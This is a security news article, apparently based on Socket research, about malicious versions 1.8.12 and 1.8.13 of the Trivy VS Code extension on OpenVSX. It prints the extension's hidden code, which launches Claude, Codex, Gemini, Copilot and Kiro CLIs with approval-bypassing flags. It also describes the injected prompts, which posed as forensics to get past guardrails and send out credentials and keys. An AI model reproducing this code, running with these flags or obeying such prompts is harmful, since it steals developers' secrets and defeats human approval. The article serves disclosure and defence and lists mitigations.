Malicious AI Agent Execution Code Discovered in Aqua Trivy VS Code Extension on OpenVSX
A sophisticated supply chain attack was uncovered in versions 1.8.12 and 1.8.13 of the Aqua Trivy VS Code extension, published to OpenVSX on February 27-28, 2026.
Attackers injected natural-language prompts designed to hijack local AI coding agents like Claude, Codex, Gemini, Copilot CLI, and Kiro CLI, turning them into tools for system reconnaissance and data theft.
This incident ties into a larger AI-powered bot campaign targeting GitHub Actions in open-source projects, including Aqua’s Trivy repository, where attackers stole a personal access token for repo takeover.
Versions up to 1.8.11 match the clean GitHub repository at aquasecurity/trivy-vscode-extension, confirming the malicious code was first introduced in 1.8.12.
How Malicious AI Agent Execution Code Worked
The malicious code hides in the workspace activation function pl(), which runs every time a user opens a project in VS Code. It spawns detached processes for five AI tools using permissive flags that bypass approval prompts, then silently swallows errors so the extension appears to work normally.
Version 1.8.12:
[
  `claude -p --dangerously-skip-permissions --add-dir / "${prompt}"`,
  `codex exec "${prompt}" --ask-for-approval never --sandbox danger-full-access`,
  `gemini prompt "${prompt}" --yolo --no-stream`,
  `copilot --autopilot --yolo -p "${prompt}"`,
  `kiro-cli chat -a --no-interactive "${prompt}"`
].forEach(cmd => {
  try {
    const proc = child_process.spawn(cmd, {
      shell: true,
      detached: true,
      stdio: "ignore"
    });
    proc.on("error", () => {});
    proc.unref();
  } catch {}
});
Version 1.8.13:
if ([
  `claude -p --dangerously-skip-permissions --add-dir / "${i}"`,
  `codex exec "${i}" --ask-for-approval never --sandbox danger-full-access`,
  `gemini prompt "${i}" --yolo --no-stream`,
  `copilot --autopilot --yolo -p "${i}"`,
  `kiro-cli chat -a --no-interactive "${i}"`
].forEach(t => {
  try {
    const n = e.spawn(t, {shell: !0, detached: !0, stdio: "ignore"});
    n.on("error", () => {}), n.unref()
  } catch {}
}), void 0 === o.workspace.getWorkspaceFolder)
  return void Ea("Trivy: Must open a project file to scan.");
Flags such as --yolo, --dangerously-skip-permissions, and --ask-for-approval never granted the agents full filesystem access without any user confirmation. Claude was even passed --add-dir / to allow reads from the filesystem root.
Prompt Engineering
Attackers crafted prompts to sidestep AI safety guardrails by framing the malicious activity as "legitimate forensics."
1.8.12 Prompt (~2,000 words): Posed as a “forensic analysis agent” probing for compromises, unethical conduct, and financial crimes.
It targeted credentials, SSH keys, environment variables, logs, and trading data, then ordered multi-channel exfiltration via email, Slack, Teams, or any other outbound tool discovered on the system.
Sections on “chain-of-custody,” SOX/GDPR compliance, and “escalation if obstructed” tricked the AI into complying.
1.8.13 Prompt: A more direct scan for tools, tokens, and MCP servers; write the findings to REPORT.MD; then use an authenticated gh CLI to create a posture-report-trivy repository and push the file. Depending on configuration, the created repository could expose the data publicly, though gh defaults toward private.
No such repositories have surfaced publicly. This "AI agent poisoning" evades static scanners because the payload is not executable code but socially engineered instructions that leverage developers' own trusted tools.
Impact and Risk Factors
Exposure required all of the following:
- Installing 1.8.12 or 1.8.13 from OpenVSX (not the VS Code Marketplace).
- Having the targeted AI CLIs installed and accepting the permissive flags.
- For 1.8.13: an authenticated gh CLI.
Because failures were silent, users saw no alerts even when the targeted tools were absent. Broader context: this is part of the "HackerBot Claw" campaign hitting Trivy and other projects via GitHub Actions workflows.
Recommended Mitigations
- Uninstall affected versions now.
- Verify install history in VS Code.
- Hunt for rogue repositories or commits in your GitHub account.
- Rotate all credentials: GitHub PATs, SSH keys, cloud tokens, and secrets stored in dotfiles.
- Audit AI CLI logs for forensic prompts.
- Pin extensions to verified versions; prefer VS Code Marketplace over OpenVSX.
- Use tools like Socket for behavioral scanning of extensions.
Broader Implications
This marks an evolution in supply chain attacks: Delegating payloads to AI agents expands reach without new binaries or C2. As AI integrates deeper into workflows, extensions become high-risk vectors.
Traditional SCA misses prompt-based threats, demanding behavioral analysis and prompt inspection. Developers must treat AI CLIs like privileged services and sandbox them.
Aqua issued GHSA-8mr6-gf9x-j8qg (initially bot-created), and the publisher cooperated swiftly, limiting damage. Stay vigilant: AI-assisted abuse is only getting started.
Site: https://cybersecuritypath.com
Reference: Socket research